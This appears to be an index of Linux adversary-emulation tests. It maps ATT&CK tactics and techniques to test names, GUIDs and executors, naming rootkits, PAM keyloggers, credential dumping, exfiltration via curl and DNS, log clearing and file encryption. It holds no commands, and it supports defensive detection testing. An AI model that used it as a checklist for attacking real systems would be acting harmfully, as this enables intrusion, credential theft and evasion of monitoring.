persistence,T1176,Browser Extensions,1,Chrome (Developer Mode),3ecd790d-2617-4abf-9a8c-4e8d47da9ee1,manual
persistence,T1176,Browser Extensions,2,Chrome (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual
persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual
persistence,T1546.005,Event Triggered Execution: Trap,1,Trap,a74b2e07-5952-4c03-8b56-56274b076b61,sh
persistence,T1574.006,Hijack Execution Flow: LD_PRELOAD,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash
persistence,T1574.006,Hijack Execution Flow: LD_PRELOAD,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
persistence,T1136.001,Create Account: Local Account,1,Create a user account on a Linux system,40d8eabd-e394-46f6-8785-b9bfa1d011d2,bash
persistence,T1136.001,Create Account: Local Account,5,Create a new user in Linux with `root` UID and GID.,a1040a30-d28b-4eda-bd99-bb2861a4616c,bash
persistence,T1098.004,SSH Authorized Keys,1,Modify SSH Authorized Keys,342cc723-127c-4d3a-8292-9c0c6b4ecadc,bash
persistence,T1547.006,Boot or Logon Autostart Execution: Kernel Modules and Extensions,1,Linux - Load Kernel Module via insmod,687dcb93-9656-4853-9c36-9977315e9d23,bash
persistence,T1053.006,Scheduled Task/Job: Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash
persistence,T1053.006,Scheduled Task/Job: Systemd Timers,2,Create a user level transient systemd service and timer,3de33f5b-62e5-4e63-a2a0-6fd8808c80ec,sh
persistence,T1053.006,Scheduled Task/Job: Systemd Timers,3,Create a system level transient systemd service and timer,d3eda496-1fc0-49e9-aff5-3bec5da9fa22,sh
persistence,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh
persistence,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh
persistence,T1037.004,Boot or Logon Initialization Scripts: Rc.common,2,rc.common,c33f3d80-5f04-419b-a13a-854d1cbdbf3a,bash
persistence,T1037.004,Boot or Logon Initialization Scripts: Rc.common,3,rc.local,126f71af-e1c9-405c-94ef-26a47b16c102,bash
persistence,T1543.002,Create or Modify System Process: Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash
persistence,T1543.002,Create or Modify System Process: Systemd Service,2,"Create Systemd Service file, Enable the service , Modify and Reload the service.",c35ac4a8-19de-43af-b9f8-755da7e89c89,bash
persistence,T1053.002,Scheduled Task/Job: At,2,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-48a6-aeaf-3659d24ceb4e,sh
privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,2,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh
privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,3,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh
privilege-escalation,T1053.003,Scheduled Task/Job: Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
privilege-escalation,T1053.003,Scheduled Task/Job: Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
privilege-escalation,T1053.003,Scheduled Task/Job: Cron,3,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash
privilege-escalation,T1546.005,Event Triggered Execution: Trap,1,Trap,a74b2e07-5952-4c03-8b56-56274b076b61,sh
privilege-escalation,T1574.006,Hijack Execution Flow: LD_PRELOAD,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash
privilege-escalation,T1574.006,Hijack Execution Flow: LD_PRELOAD,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,2,Set a SetUID flag on file,759055b3-3885-4582-a8ec-c00c9d64dd79,sh
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,3,Set a SetGID flag on file,db55f666-7cba-46c6-9fe6-205a05c3242c,sh
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,4,Make and modify capabilities of a binary,db53959c-207d-4000-9e7a-cd8eb417e072,sh
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,5,Provide the SetUID capability to a file,1ac3272f-9bcf-443a-9888-4b1d3de785c1,sh
privilege-escalation,T1547.006,Boot or Logon Autostart Execution: Kernel Modules and Extensions,1,Linux - Load Kernel Module via insmod,687dcb93-9656-4853-9c36-9977315e9d23,bash
privilege-escalation,T1053.006,Scheduled Task/Job: Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash
privilege-escalation,T1053.006,Scheduled Task/Job: Systemd Timers,2,Create a user level transient systemd service and timer,3de33f5b-62e5-4e63-a2a0-6fd8808c80ec,sh
privilege-escalation,T1053.006,Scheduled Task/Job: Systemd Timers,3,Create a system level transient systemd service and timer,d3eda496-1fc0-49e9-aff5-3bec5da9fa22,sh
privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh
privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh
privilege-escalation,T1037.004,Boot or Logon Initialization Scripts: Rc.common,2,rc.common,c33f3d80-5f04-419b-a13a-854d1cbdbf3a,bash
privilege-escalation,T1037.004,Boot or Logon Initialization Scripts: Rc.common,3,rc.local,126f71af-e1c9-405c-94ef-26a47b16c102,bash
privilege-escalation,T1543.002,Create or Modify System Process: Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash
privilege-escalation,T1543.002,Create or Modify System Process: Systemd Service,2,"Create Systemd Service file, Enable the service , Modify and Reload the service.",c35ac4a8-19de-43af-b9f8-755da7e89c89,bash
privilege-escalation,T1053.002,Scheduled Task/Job: At,2,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
credential-access,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,1,Malicious PAM rule,4b9dde80-ae22-44b1-a82a-644bf009eb9c,sh
credential-access,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,2,Malicious PAM module,65208808-3125-4a2e-8389-a0a00e9ab326,sh
credential-access,T1056.001,Input Capture: Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh
credential-access,T1056.001,Input Capture: Keylogging,3,Logging bash history to syslog,0e59d59d-3265-4d35-bebd-bf5c1ec40db5,sh
credential-access,T1056.001,Input Capture: Keylogging,4,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,sh
credential-access,T1056.001,Input Capture: Keylogging,5,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28ffe43becca,sh
credential-access,T1056.001,Input Capture: Keylogging,6,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,sh
credential-access,T1110.001,Brute Force: Password Guessing,4,SUDO brute force Debian,464b63e8-bf1f-422e-9e2c-2aa5080b6f9a,sh
credential-access,T1110.001,Brute Force: Password Guessing,5,SUDO brute force Redhat,b72958a7-53e3-4809-9ee1-58f6ecd99ade,sh
credential-access,T1003.007,OS Credential Dumping: Proc Filesystem,1,Dump individual process memory with sh (Local),7e91138a-8e74-456d-a007-973d67a0bb80,sh
credential-access,T1003.007,OS Credential Dumping: Proc Filesystem,2,Dump individual process memory with Python (Local),437b2003-a20d-4ed8-834c-4964f24eec63,sh
credential-access,T1003.007,OS Credential Dumping: Proc Filesystem,3,Capture Passwords with MimiPenguin,a27418de-bdce-4ebd-b655-38f04842bf0c,bash
credential-access,T1040,Network Sniffing,1,Packet Capture Linux using tshark or tcpdump,7fe741f7-b265-4951-a7c7-320889083b3e,bash
credential-access,T1040,Network Sniffing,9,"Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo",10c710c9-9104-4d5f-8829-5b65391e2a29,bash
credential-access,T1040,Network Sniffing,10,"Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo",7a0895f0-84c1-4adf-8491-a21510b1d4c1,bash
credential-access,T1040,Network Sniffing,11,"Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo",515575ab-d213-42b1-aa64-ef6a2dd4641b,bash
credential-access,T1040,Network Sniffing,12,"Packet Capture Linux socket AF_PACKET,SOCK_RAW with BPF filter for UDP with sudo",b1cbdf8b-6078-48f5-a890-11ea19d7f8e9,bash
credential-access,T1552,Unsecured Credentials,1,AWS - Retrieve EC2 Password Data using stratus,a21118de-b11e-4ebd-b655-42f11142df0c,sh
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,9,LaZagne.py - Dump Credentials from Firefox Browser,87e88698-621b-4c45-8a89-4eaebdeaabb1,sh
credential-access,T1552.004,Unsecured Credentials: Private Keys,2,Discover Private SSH Keys,46959285-906d-40fa-9437-5a439accd878,sh
credential-access,T1552.004,Unsecured Credentials: Private Keys,3,Copy Private SSH Keys with CP,7c247dc7-5128-4643-907b-73a76d9135c3,sh
credential-access,T1552.004,Unsecured Credentials: Private Keys,4,Copy Private SSH Keys with rsync,864bb0b2-6bb5-489a-b43b-a77b3a16d68a,sh
credential-access,T1552.004,Unsecured Credentials: Private Keys,5,Copy the users GnuPG directory with rsync,2a5a0601-f5fb-4e2e-aa09-73282ae6afca,sh
credential-access,T1552.003,Unsecured Credentials: Bash History,1,Search Through Bash History,3cfde62b-7c33-4b26-a61e-755d6131c8ce,sh
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,2,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,5,Find and Access Github Credentials,da4f751a-020b-40d7-b9ff-d433b7799803,bash
credential-access,T1110.004,Brute Force: Credential Stuffing,1,SSH Credential Stuffing From Linux,4f08197a-2a8a-472d-9589-cd2895ef22ad,bash
credential-access,T1003.008,OS Credential Dumping: /etc/passwd and /etc/shadow,1,Access /etc/shadow (Local),3723ab77-c546-403c-8fb4-bb577033b235,bash
credential-access,T1003.008,OS Credential Dumping: /etc/passwd and /etc/shadow,2,Access /etc/passwd (Local),60e860b6-8ae6-49db-ad07-5e73edd88f5d,sh
credential-access,T1003.008,OS Credential Dumping: /etc/passwd and /etc/shadow,3,"Access /etc/{shadow,passwd} with a standard bin that's not cat",df1a55ae-019d-4120-bc35-94f4bc5c4b0a,bash
credential-access,T1003.008,OS Credential Dumping: /etc/passwd and /etc/shadow,4,"Access /etc/{shadow,passwd} with shell builtins",f5aa6543-6cb2-4fae-b9c2-b96e14721713,bash
discovery,T1033,System Owner/User Discovery,2,System Owner/User Discovery,2a9b677d-a230-44f4-ad86-782df1ef108c,sh
discovery,T1087.001,Account Discovery: Local Account,1,Enumerate all accounts (Local),f8aab3dd-5990-4bf8-b8ab-2226c951696f,sh
discovery,T1087.001,Account Discovery: Local Account,2,View sudoers access,fed9be70-0186-4bde-9f8a-20945f9370c2,sh
discovery,T1087.001,Account Discovery: Local Account,3,View accounts with UID 0,c955a599-3653-4fe5-b631-f11c00eb0397,sh
discovery,T1087.001,Account Discovery: Local Account,4,List opened files by user,7e46c7a5-0142-45be-a858-1a3ecb4fd3cb,sh
discovery,T1087.001,Account Discovery: Local Account,5,Show if a user account has ever logged in remotely,0f0b6a29-08c3-44ad-a30b-47fd996b2110,sh
discovery,T1087.001,Account Discovery: Local Account,6,Enumerate users and groups,e6f36545-dc1e-47f0-9f48-7f730f54a02e,sh
discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,1,Detect Virtualization Environment (Linux),dfbd1a21-540d-4574-9731-e852bd6fe840,sh
discovery,T1007,System Service Discovery,3,System Service Discovery - systemctl,f4b26bce-4c2c-46c0-bcc5-fce062d38bef,bash
discovery,T1040,Network Sniffing,1,Packet Capture Linux using tshark or tcpdump,7fe741f7-b265-4951-a7c7-320889083b3e,bash
discovery,T1040,Network Sniffing,9,"Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo",10c710c9-9104-4d5f-8829-5b65391e2a29,bash
discovery,T1040,Network Sniffing,10,"Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo",7a0895f0-84c1-4adf-8491-a21510b1d4c1,bash
discovery,T1040,Network Sniffing,11,"Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo",515575ab-d213-42b1-aa64-ef6a2dd4641b,bash
discovery,T1040,Network Sniffing,12,"Packet Capture Linux socket AF_PACKET,SOCK_RAW with BPF filter for UDP with sudo",b1cbdf8b-6078-48f5-a890-11ea19d7f8e9,bash
discovery,T1135,Network Share Discovery,2,Network Share Discovery - linux,875805bc-9e86-4e87-be86-3a5527315cae,bash
discovery,T1082,System Information Discovery,3,List OS Information,cccb070c-df86-4216-a5bc-9fb60c74e27c,sh
discovery,T1082,System Information Discovery,4,Linux VM Check via Hardware,31dad7ad-2286-4c02-ae92-274418c85fec,bash
discovery,T1082,System Information Discovery,5,Linux VM Check via Kernel Modules,8057d484-0fae-49a4-8302-4812c4f1e64e,bash
discovery,T1082,System Information Discovery,7,Hostname Discovery,486e88ea-4f56-470f-9b57-3f4d73f39133,bash
discovery,T1082,System Information Discovery,11,Environment variables discovery on macos and linux,fcbdd43f-f4ad-42d5-98f3-0218097e2720,sh
discovery,T1082,System Information Discovery,24,Linux List Kernel Modules,034fe21c-3186-49dd-8d5d-128b35f181c7,sh
discovery,T1217,Browser Bookmark Discovery,1,List Mozilla Firefox Bookmark Database Files on Linux,3a41f169-a5ab-407f-9269-abafdb5da6c2,sh
discovery,T1016,System Network Configuration Discovery,3,System Network Configuration Discovery,c141bbdb-7fca-4254-9fd6-f47e79447e17,sh
discovery,T1083,File and Directory Discovery,3,Nix File and Directory Discovery,ffc8b249-372a-4b74-adcd-e4c0430842de,sh
discovery,T1083,File and Directory Discovery,4,Nix File and Directory Discovery 2,13c5e1ae-605b-46c4-a79f-db28c77ff24e,sh
discovery,T1049,System Network Connections Discovery,3,System Network Connections Discovery Linux & MacOS,9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2,sh
discovery,T1057,Process Discovery,1,Process Discovery - ps,4ff64f0b-aaf2-4866-b39d-38d9791407cc,sh
discovery,T1069.001,Permission Groups Discovery: Local Groups,1,Permission Groups Discovery (Local),952931a4-af0b-4335-bbbe-73c8c5b327ae,sh
discovery,T1201,Password Policy Discovery,1,Examine password complexity policy - Ubuntu,085fe567-ac84-47c7-ac4c-2688ce28265b,bash
discovery,T1201,Password Policy Discovery,2,Examine password complexity policy - CentOS/RHEL 7.x,78a12e65-efff-4617-bc01-88f17d71315d,bash
discovery,T1201,Password Policy Discovery,3,Examine password complexity policy - CentOS/RHEL 6.x,6ce12552-0adb-4f56-89ff-95ce268f6358,bash
discovery,T1201,Password Policy Discovery,4,Examine password expiration policy - All Linux,7c86c55c-70fa-4a05-83c9-3aa19b145d1a,bash
discovery,T1518.001,Software Discovery: Security Software Discovery,4,Security Software Discovery - ps (Linux),23b91cd2-c99c-4002-9e41-317c63e024a2,sh
discovery,T1018,Remote System Discovery,6,Remote System Discovery - arp nix,acb6b1ff-e2ad-4d64-806c-6c35fe73b951,sh
discovery,T1018,Remote System Discovery,7,Remote System Discovery - sweep,96db2632-8417-4dbb-b8bb-a8b92ba391de,sh
discovery,T1018,Remote System Discovery,12,Remote System Discovery - ip neighbour,158bd4dd-6359-40ab-b13c-285b9ef6fa25,sh
discovery,T1018,Remote System Discovery,13,Remote System Discovery - ip route,1a4ebe70-31d0-417b-ade2-ef4cb3e7d0e1,sh
discovery,T1018,Remote System Discovery,14,Remote System Discovery - ip tcp_metrics,6c2da894-0b57-43cb-87af-46ea3b501388,sh
discovery,T1046,Network Service Scanning,1,Port Scan,68e907da-2539-48f6-9fc9-257a78c05540,bash
discovery,T1046,Network Service Scanning,2,Port Scan Nmap,515942b0-a09f-4163-a7bb-22fefb6f185f,sh
command-and-control,T1132.001,Data Encoding: Standard Encoding,1,Base64 Encoded data.,1164f70f-9a88-4dff-b9ff-dc70e7bf0c25,sh
command-and-control,T1090.003,Proxy: Multi-hop Proxy,3,Tor Proxy Usage - Debian/Ubuntu,5ff9d047-6e9c-4357-b39b-5cf89d9b59c7,sh
command-and-control,T1571,Non-Standard Port,2,Testing usage of uncommonly used port,5db21e1d-dd9c-4a50-b885-b1e748912767,sh
command-and-control,T1071.001,Application Layer Protocol: Web Protocols,3,Malicious User Agents - Nix,2d7c471a-e887-4b78-b0dc-b0df1f2e0658,sh
command-and-control,T1105,Ingress Tool Transfer,1,rsync remote file copy (push),0fc6e977-cb12-44f6-b263-2824ba917409,bash
command-and-control,T1105,Ingress Tool Transfer,2,rsync remote file copy (pull),3180f7d5-52c0-4493-9ea0-e3431a84773f,bash
command-and-control,T1105,Ingress Tool Transfer,3,scp remote file copy (push),83a49600-222b-4866-80a0-37736ad29344,bash
command-and-control,T1105,Ingress Tool Transfer,4,scp remote file copy (pull),b9d22b9a-9778-4426-abf0-568ea64e9c33,bash
command-and-control,T1105,Ingress Tool Transfer,5,sftp remote file copy (push),f564c297-7978-4aa9-b37a-d90477feea4e,bash
command-and-control,T1105,Ingress Tool Transfer,6,sftp remote file copy (pull),0139dba1-f391-405e-a4f5-f3989f2c88ef,bash
command-and-control,T1105,Ingress Tool Transfer,14,whois file download,c99a829f-0bb8-4187-b2c6-d47d1df74cab,sh
command-and-control,T1105,Ingress Tool Transfer,27,Linux Download File and Run,bdc373c5-e9cf-4563-8a7b-a9ba720a90f3,sh
command-and-control,T1090.001,Proxy: Internal Proxy,1,Connection Proxy,0ac21132-4485-4212-a681-349e8a6637cd,sh
impact,T1486,Data Encrypted for Impact,1,Encrypt files using gpg (Linux),7b8ce084-3922-4618-8d22-95f996173765,bash
impact,T1486,Data Encrypted for Impact,2,Encrypt files using 7z (Linux),53e6735a-4727-44cc-b35b-237682a151ad,bash
impact,T1486,Data Encrypted for Impact,3,Encrypt files using ccrypt (Linux),08cbf59f-85da-4369-a5f4-049cffd7709f,bash
impact,T1486,Data Encrypted for Impact,4,Encrypt files using openssl (Linux),142752dc-ca71-443b-9359-cf6f497315f1,bash
impact,T1496,Resource Hijacking,1,macOS/Linux - Simulate CPU Load with Yes,904a5a0e-fb02-490d-9f8d-0e256eb37549,bash
impact,T1485,Data Destruction,2,macOS/Linux - Overwrite file with DD,38deee99-fd65-4031-bec8-bfa4f9f26146,bash
impact,T1529,System Shutdown/Reboot,3,Restart System via `shutdown` - macOS/Linux,6326dbc4-444b-4c04-88f4-27e94d0327cb,bash
impact,T1529,System Shutdown/Reboot,4,Shutdown System via `shutdown` - macOS/Linux,4963a81e-a3ad-4f02-adda-812343b351de,bash
impact,T1529,System Shutdown/Reboot,5,Restart System via `reboot` - macOS/Linux,47d0b042-a918-40ab-8cf9-150ffe919027,bash
impact,T1529,System Shutdown/Reboot,6,Shutdown System via `halt` - Linux,918f70ab-e1ef-49ff-bc57-b27021df84dd,bash
impact,T1529,System Shutdown/Reboot,7,Reboot System via `halt` - Linux,78f92e14-f1e9-4446-b3e9-f1b921f2459e,bash
impact,T1529,System Shutdown/Reboot,8,Shutdown System via `poweroff` - Linux,73a90cd2-48a2-4ac5-8594-2af35fa909fa,bash
impact,T1529,System Shutdown/Reboot,9,Reboot System via `poweroff` - Linux,61303105-ff60-427b-999e-efb90b314e41,bash
execution,T1053.003,Scheduled Task/Job: Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
execution,T1053.003,Scheduled Task/Job: Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
execution,T1053.003,Scheduled Task/Job: Cron,3,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash
execution,T1053.006,Scheduled Task/Job: Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash
execution,T1053.006,Scheduled Task/Job: Systemd Timers,2,Create a user level transient systemd service and timer,3de33f5b-62e5-4e63-a2a0-6fd8808c80ec,sh
execution,T1053.006,Scheduled Task/Job: Systemd Timers,3,Create a system level transient systemd service and timer,d3eda496-1fc0-49e9-aff5-3bec5da9fa22,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,1,Create and Execute Bash Shell Script,7e7ac3ed-f795-4fa5-b711-09d6fbe9b873,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,2,Command-Line Interface,d0c88567-803d-4dca-99b4-7ce65e7b257c,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,3,Harvest SUID executable files,46274fc6-08a7-4956-861b-24cbbaa0503c,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,4,LinEnum tool execution,a2b35a63-9df1-4806-9a4d-5fe0500845f2,sh
execution,T1059.006,Command and Scripting Interpreter: Python,1,Execute shell script via python's command mode arguement,3a95cdb2-c6ea-4761-b24e-02b71889b8bb,sh
execution,T1059.006,Command and Scripting Interpreter: Python,2,Execute Python via scripts (Linux),6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8,sh
execution,T1059.006,Command and Scripting Interpreter: Python,3,Execute Python via Python executables (Linux),0b44d79b-570a-4b27-a31f-3bf2156e5eaa,sh
execution,T1059.006,Command and Scripting Interpreter: Python,4,Python pty module and spawn function used to spawn sh or bash,161d694c-b543-4434-85c3-c3a433e33792,bash
execution,T1053.002,Scheduled Task/Job: At,2,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
exfiltration,T1048.002,Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol,2,Exfiltrate data HTTPS using curl linux,4a4f31e2-46ea-4c26-ad89-f09ad1d5fe01,bash
exfiltration,T1048,Exfiltration Over Alternative Protocol,1,Exfiltration Over Alternative Protocol - SSH,f6786cc8-beda-4915-a4d6-ac2f193bb988,sh
exfiltration,T1048,Exfiltration Over Alternative Protocol,2,Exfiltration Over Alternative Protocol - SSH,7c3cb337-35ae-4d06-bf03-3032ed2ec268,sh
exfiltration,T1030,Data Transfer Size Limits,1,Data Transfer Size Limits,ab936c51-10f4-46ce-9144-e02137b2016a,sh
exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,1,Exfiltration Over Alternative Protocol - HTTP,1d1abbd6-a3d3-4b2e-bef5-c59293f46eff,manual
exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,3,Exfiltration Over Alternative Protocol - DNS,c403b5a4-b5fc-49f2-b181-d1c80d27db45,manual
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
2 defense-evasion T1556.003 Modify Authentication Process: Pluggable Authentication Modules 1 Malicious PAM rule 4b9dde80-ae22-44b1-a82a-644bf009eb9c sh
3 defense-evasion T1556.003 Modify Authentication Process: Pluggable Authentication Modules 2 Malicious PAM module 65208808-3125-4a2e-8389-a0a00e9ab326 sh
4 defense-evasion T1222.002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification 1 chmod - Change file or folder mode (numeric mode) 34ca1464-de9d-40c6-8c77-690adf36a135 bash
5 defense-evasion T1222.002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification 2 chmod - Change file or folder mode (symbolic mode) fc9d6695-d022-4a80-91b1-381f5c35aff3 bash
6 defense-evasion T1222.002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification 3 chmod - Change file or folder mode (numeric mode) recursively ea79f937-4a4d-4348-ace6-9916aec453a4 bash
7 defense-evasion T1222.002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification 4 chmod - Change file or folder mode (symbolic mode) recursively 0451125c-b5f6-488f-993b-5a32b09f7d8f bash
8 defense-evasion T1222.002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification 5 chown - Change file or folder ownership and group d169e71b-85f9-44ec-8343-27093ff3dfc0 bash
9 defense-evasion T1222.002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification 6 chown - Change file or folder ownership and group recursively b78598be-ff39-448f-a463-adbf2a5b7848 bash
10 defense-evasion T1222.002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification 7 chown - Change file or folder mode ownership only 967ba79d-f184-4e0e-8d09-6362b3162e99 bash
11 defense-evasion T1222.002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification 8 chown - Change file or folder ownership recursively 3b015515-b3d8-44e9-b8cd-6fa84faf30b2 bash
12 defense-evasion T1222.002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification 9 chattr - Remove immutable file attribute e7469fe2-ad41-4382-8965-99b94dd3c13f sh
13 defense-evasion T1222.002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification 10 Chmod through c script 973631cf-6680-4ffa-a053-045e1b6b67ab sh
14 defense-evasion T1222.002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification 11 Chown through c script 18592ba1-5f88-4e3c-abc8-ab1c6042e389 sh
15 defense-evasion T1014 Rootkit 1 Loadable Kernel Module based Rootkit dfb50072-e45a-4c75-a17e-a484809c8553 sh
16 defense-evasion T1014 Rootkit 2 Loadable Kernel Module based Rootkit 75483ef8-f10f-444a-bf02-62eb0e48db6f sh
17 defense-evasion T1014 Rootkit 3 dynamic-linker based rootkit (libprocesshider) 1338bf0c-fd0c-48c0-9e65-329f18e2c0d3 sh
18 defense-evasion T1014 Rootkit 4 Loadable Kernel Module based Rootkit (Diamorphine) 0b996469-48c6-46e2-8155-a17f8b6c2247 sh
19 defense-evasion T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 Sudo usage 150c3a08-ee6e-48a6-aeaf-3659d24ceb4e sh
20 defense-evasion T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching 2 Unlimited sudo cache timeout a7b17659-dd5e-46f7-b7d1-e6792c91d0bc sh
21 defense-evasion T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching 3 Disable tty_tickets for sudo caching 91a60b03-fb75-4d24-a42e-2eb8956e8de1 sh
22 defense-evasion T1036.005 Masquerading: Match Legitimate Name or Location 1 Execute a process from a directory masquerading as the current parent directory. 812c3ab8-94b0-4698-a9bf-9420af23ce24 sh
23 defense-evasion T1497.001 Virtualization/Sandbox Evasion: System Checks 1 Detect Virtualization Environment (Linux) dfbd1a21-540d-4574-9731-e852bd6fe840 sh
24 defense-evasion T1070.002 Indicator Removal on Host: Clear Linux or Mac System Logs 1 rm -rf 989cc1b1-3642-4260-a809-54f9dd559683 sh
25 defense-evasion T1070.002 Indicator Removal on Host: Clear Linux or Mac System Logs 2 Overwrite Linux Mail Spool 1602ff76-ed7f-4c94-b550-2f727b4782d4 bash
26 defense-evasion T1070.002 Indicator Removal on Host: Clear Linux or Mac System Logs 3 Overwrite Linux Log d304b2dc-90b4-4465-a650-16ddd503f7b5 bash
27 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 1 Clear Bash history (rm) a934276e-2be5-4a36-93fd-98adbb5bd4fc sh
28 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 2 Clear Bash history (echo) cbf506a5-dd78-43e5-be7e-a46b7c7a0a11 sh
29 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 3 Clear Bash history (cat dev/null) b1251c35-dcd3-4ea1-86da-36d27b54f31f sh
30 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 4 Clear Bash history (ln dev/null) 23d348f3-cc5c-4ba9-bd0a-ae09069f0914 sh
31 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 5 Clear Bash history (truncate) 47966a1d-df4f-4078-af65-db6d9aa20739 sh
32 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 6 Clear history of a bunch of shells 7e6721df-5f08-4370-9255-f06d8a77af4c sh
33 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 7 Clear and Disable Bash History Logging 784e4011-bd1a-4ecd-a63a-8feb278512e6 sh
34 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 8 Use Space Before Command to Avoid Logging to History 53b03a54-4529-4992-852d-a00b4b7215a6 sh
35 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 9 Disable Bash History Logging with SSH -T 5f8abd62-f615-43c5-b6be-f780f25790a1 sh
36 defense-evasion T1140 Deobfuscate/Decode Files or Information 3 Base64 decoding with Python 356dc0e8-684f-4428-bb94-9313998ad608 sh
37 defense-evasion T1140 Deobfuscate/Decode Files or Information 4 Base64 decoding with Perl 6604d964-b9f6-4d4b-8ce8-499829a14d0a sh
38 defense-evasion T1140 Deobfuscate/Decode Files or Information 5 Base64 decoding with shell utilities b4f6a567-a27a-41e5-b8ef-ac4b4008bb7e sh
